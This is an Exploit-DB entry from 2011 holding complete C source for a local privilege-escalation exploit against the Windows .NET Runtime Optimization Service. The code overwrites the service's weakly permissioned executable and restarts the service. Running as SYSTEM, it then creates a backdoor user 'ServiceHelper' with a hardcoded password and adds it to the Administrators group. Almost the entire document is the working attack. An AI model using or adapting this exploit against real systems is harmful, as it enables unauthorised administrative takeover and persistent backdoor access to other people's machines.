.NET Runtime Optimization Service - Local Privilege Escalation

EDB-ID:

16940

CVE:



Author:

XenoMuta

Type:

local


Platform:

Windows

Date:

2011-03-08


/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <xenomuta@tuxfamily.org>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a

    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
 /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/

 xenomuta [at] tuxfamily.org
 xenomuta [at] gmail.com
 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

 This one's a no-brainer, plain simple:

 This service's EXE file can be overwritten by any non-admin domain user
 and local power users ( wich are the default permissions set ).
 This exploit compiles to a service that uses the original service's id.

 Tested on Windows 2003, WinXP (sp3) and Win7 
 ( my guess is that it runs on any win box running this service ).

 greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!
 
 bless y'all!

*/
#include <stdio.h>
#include <windows.h>

SERVICE_STATUS          ServiceStatus;
SERVICE_STATUS_HANDLE   hStatus;

#define PWN_EXE     "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT   "mscorsvw.exe"
#define PWN_NAME    ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID      "clr_optimization_v2.0.50727_32"

void  ServiceMain(int argc, char** argv) {
    if (InitService()) {
       ServiceStatus.dwCurrentState = SERVICE_STOPPED;
       ServiceStatus.dwWin32ExitCode = -1;
       SetServiceStatus(hStatus, &ServiceStatus);
       return;
    }
   ServiceStatus.dwCurrentState = SERVICE_RUNNING;
   SetServiceStatus (hStatus, &ServiceStatus);
}

void ControlHandler(DWORD request);
int InitService();

int main(int argc, char **argv) {
    char acUserName[100];
    DWORD nUserName = sizeof(acUserName);
    GetUserName(acUserName, &nUserName);

    if (strcmp((char *)&acUserName, "SYSTEM")) {
        char *str = (char *)malloc(2048);
        memset(str, 0, 2048);
        snprintf(str, 2048, "%s.bak", PWN_EXE);
        if (rename(PWN_EXE, str) != 0) {
           fprintf(stderr, " :(  sorry, can't write to file.\n");
           exit(1);
        }
        CopyFile(argv[0], PWN_EXE, !0);
        snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
        printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
        system(str);
    }

    SERVICE_TABLE_ENTRY ServiceTable[2];

    ServiceTable[0].lpServiceName = PWN_ID;
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
    StartServiceCtrlDispatcher(ServiceTable);

    return 0;
}

int InitService() {
    system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}